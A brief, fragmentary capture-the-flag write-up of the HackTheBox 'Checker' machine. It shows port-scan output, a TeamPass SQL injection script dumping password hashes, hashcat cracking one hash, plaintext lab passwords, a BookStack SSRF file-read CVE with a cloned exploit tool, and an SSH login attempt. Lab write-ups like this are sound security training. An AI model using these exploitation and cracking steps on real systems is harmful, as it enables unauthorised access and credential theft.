✔️Checker

https://app.hackthebox.com/machines/Checker

Recon

nmap

PORT     STATE SERVICE REASON         VERSION
22/tcp   open  ssh     syn-ack ttl 63 OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
80/tcp   open  http    syn-ack ttl 63 Apache httpd
8080/tcp open  http    syn-ack ttl 63 Apache httpd
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

User

Teampass CVE-2023-1545

huntr - The world’s first bug bounty platform for AI/MLhuntr.com

./teampass-sqli.sh http://checker.htb:8080
There are 2 users in the system:
admin: $2y$10$lKCae0EIUNj6f96ZnLqnC.LbWqrBQCT1LuHEFht6PmE4yH75rpWya
bob: $2y$10$yMypIj1keU.VAqBI692f..XXn0vfyBL7C1EhOs35G59NxmtpJ/tiy

hashcat -m 3200 hashes /usr/share/wordlists/rockyou.txt --show
$2y$10$yMypIj1keU.VAqBI692f..XXn0vfyBL7C1EhOs35G59NxmtpJ/tiy:cheerleader

Bookstack

mYSeCr3T_w1kI_P4sSw0rD

Backup Location

Mobile App Setup

CVE-2023-6199 LFR via Blind SSRF

Book Stack v23.10.2 - LFR via Blind SSRF | Fluid Attacksfluidattacks.com

GitHub - synacktiv/php_filter_chains_oracle_exploit: A CLI to exploit parameters vulnerable to PHP filter chain error based oracle.GitHub

git clone https://github.com/synacktiv/php_filter_chains_oracle_exploit
cd php_filter_chains_oracle_exploit

SSH Login

hiccup-publicly-genesis

ssh reader@checker.htb
(reader@checker.htb) Password: 
(reader@checker.htb) Verification code: